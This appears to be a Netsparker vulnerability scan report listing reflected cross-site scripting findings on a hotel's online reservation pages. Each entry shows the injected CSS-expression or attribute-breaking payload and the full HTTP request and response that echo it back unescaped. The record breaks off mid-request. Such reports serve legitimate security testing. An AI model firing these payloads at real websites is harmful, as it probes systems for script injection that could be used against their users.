Date: Fri, 12 Aug 2011 04:00:35 GMT
X-Powered-By: ASP.NET
Content-Length: 351
Content-Type: text/html
Cache-control: private



<HTML>
<HEAD>
<title>Online Reservation</title>

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {}
</script>
We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000118))><br>
- /copy1/ResMain.asp

/copy1/ResMain.asp

https://www.superinn.com/copy1/ResMain.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x00011E))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x00011E))>

Request

GET /copy1/ResMain.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x00011E))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C%7C%B2%A8%95J%9B%9D%A8%B4%BE%A8%93w%AE%8D%AF%BD%A7%C7%BF%A2y%84%93%A2%BBh
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:00:37 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x00011E))><br>
- /copy1/webviewstyle.asp

/copy1/webviewstyle.asp

https://www.superinn.com/copy1/webviewstyle.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000126)..

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000126))>

Request

GET /copy1/webviewstyle.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000126))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/ResMain.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:00:44 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000126))><br>
- /copy1/Res_3.asp

/copy1/Res_3.asp

https://www.superinn.com/copy1/Res_3.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000131))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000131))>

Request

GET /copy1/Res_3.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000131))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/ResMain.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:00:59 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000131))><br>
- /copy1/Res_1.asp

/copy1/Res_1.asp

https://www.superinn.com/copy1/Res_1.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x00013C))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x00013C))>

Request

GET /copy1/Res_1.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x00013C))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/ResMain.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:01:11 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x00013C))><br>
- /copy1/Res_2.asp

/copy1/Res_2.asp

https://www.superinn.com/copy1/Res_2.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x00015D))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x00015D))>

Request

GET /copy1/Res_2.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x00015D))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/ResMain.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:01:24 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x00015D))><br>
- /copy1/res_avail.asp

/copy1/res_avail.asp

https://www.superinn.com/copy1/res_avail.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000168))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000168))>

Request

GET /copy1/res_avail.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000168))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_3.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:01:43 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000168))><br>
- /copy1/res_avail.asp

/copy1/res_avail.asp

https://www.superinn.com/copy1/res_avail.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000180))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000180))>
text2 POST 1

Request

POST /copy1/res_avail.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000180))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_3.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Content-Length: 7
Expect: 100-continue
Accept-Encoding: gzip, deflate

text2=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:02:25 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000180))><br>
- /copy1/res_1_BNR.asp

/copy1/res_1_BNR.asp

https://www.superinn.com/copy1/res_1_BNR.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x0001B3))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x0001B3))>

Request

GET /copy1/res_1_BNR.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x0001B3))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:03:09 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x0001B3))><br>
- /copy1/Res_2Send.asp

/copy1/Res_2Send.asp

https://www.superinn.com/copy1/Res_2Send.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x00022E))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x00022E))>

Request

GET /copy1/Res_2Send.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x00022E))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_2.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=FJDOLOPAFCLNHGBMFFHFHCPM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:04:30 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x00022E))><br>
- /copy1/webroom.asp

/copy1/webroom.asp

https://www.superinn.com/copy1/webroom.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000256))%3E&..

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000256))>
Rnum GET 3

Request

GET /copy1/webroom.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000256))%3E&Rnum=3 HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=FJDOLOPAFCLNHGBMFFHFHCPM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:05:39 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000256))><br>
- /copy1/Res_1.asp

/copy1/Res_1.asp

https://www.superinn.com/copy1/Res_1.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000261))%3E&md..

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000261))>
mdate GET 8/14/2011
rnum GET 1

Request

GET /copy1/Res_1.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000261))%3E&mdate=8/14/2011&rnum=1 HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=FJDOLOPAFCLNHGBMFFHFHCPM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:05:55 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000261))><br>
- /copy1/wrong.asp

/copy1/wrong.asp

https://www.superinn.com/copy1/wrong.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000288))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000288))>

Request

GET /copy1/wrong.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000288))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_2Send.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:06:20 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000288))><br>
- /copy1/Res_2Send.asp

/copy1/Res_2Send.asp

https://www.superinn.com/copy1/Res_2Send.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000294))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000294))>
text2 POST 3
text1 POST 3
Submit POST VIEW

Request

POST /copy1/Res_2Send.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000294))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_2.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Content-Length: 27
Expect: 100-continue
Accept-Encoding: gzip, deflate

text2=3&text1=3&Submit=VIEW

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:07:17 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000294))><br>
- /copy1/res_1_B.asp

/copy1/res_1_B.asp

https://www.superinn.com/copy1/res_1_B.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x0002C4))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x0002C4))>

Request

GET /copy1/res_1_B.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x0002C4))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&mdate=8/14/2011&rnum=1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:08:01 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x0002C4))><br>
- /copy1/res_avail.asp

/copy1/res_avail.asp

https://www.superinn.com/copy1/res_avail.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x0002D1))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x0002D1))>
text1 POST 8/11/2011
text2 POST 12
Submit2 POST VIEW CHART
BUTTON2 POST RETURN TO MENU

Request

POST /copy1/res_avail.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x0002D1))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_3.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Content-Length: 70
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f11%2f2011&text2=12&Submit2=VIEW+CHART&BUTTON2=RETURN+TO+MENU

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:08:49 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x0002D1))><br>
- /copy1/res_avail.asp

/copy1/res_avail.asp

https://www.superinn.com/copy1/res_avail.asp?crypt='%3E%3Cnet%20sparker=alert(0x0002F4)%3E

Parameters

Parameter Type Value
crypt GET '><net sparker=alert(0x0002F4)>
text1 POST 8/11/2011
text2 POST 12

Request

POST /copy1/res_avail.asp?crypt='%3E%3Cnet%20sparker=netsparker(0x0002F4)%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_3.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Content-Length: 28
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f11%2f2011&text2=12

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:09:40 GMT
X-Powered-By: ASP.NET
Content-Length: 141
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'><net sparker=netsparker(0x0002F4)><br>
- /copy1/res_avail.asp

/copy1/res_avail.asp

https://www.superinn.com/copy1/res_avail.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000324))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000324))>
text1 POST 8/11/2011
text2 POST 12
Submit2 POST VIEW CHART

Request

POST /copy1/res_avail.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000324))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_3.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Content-Length: 47
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f11%2f2011&text2=12&Submit2=VIEW+CHART

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:10:57 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000324))><br>
- /copy1/res_1_BNR.asp

/copy1/res_1_BNR.asp

https://www.superinn.com/copy1/res_1_BNR.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000396))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000396))>
text1 POST 8/11/2011
text2 POST 3
text3 POST 2
Submit POST CHECK AVAILABILITY
BUTTON POST RETURN TO MENU
rnum POST 3

Request

POST /copy1/res_1_BNR.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000396))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=NNEOLOPACIJJPGIHLLPPAKFH
Content-Length: 90
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f11%2f2011&text2=3&text3=2&Submit=CHECK+AVAILABILITY&BUTTON=RETURN+TO+MENU&rnum=3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:14:12 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000396))><br>
- /copy1/res_1_BNR.asp

/copy1/res_1_BNR.asp

https://www.superinn.com/copy1/res_1_BNR.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000431))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000431))>
text1 POST 8/11/2011
text2 POST 3
text3 POST 2
Submit POST CHECK AVAILABILITY
rnum POST 3

Request

POST /copy1/res_1_BNR.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000431))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=NNEOLOPACIJJPGIHLLPPAKFH
Content-Length: 68
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f11%2f2011&text2=3&text3=2&Submit=CHECK+AVAILABILITY&rnum=3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:17:43 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000431))><br>
- /copy1/Res_1.asp

/copy1/Res_1.asp

https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX..

Parameters

Parameter Type Value
crypt GET �p[������bkP�����}X���ǯ�|
mdate GET '" ns= alert(0x00038C)
rnum GET 1

Request

GET /copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&mdate=%27%22%20ns=%20netsparker(0x00038C)%20&rnum=1 HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
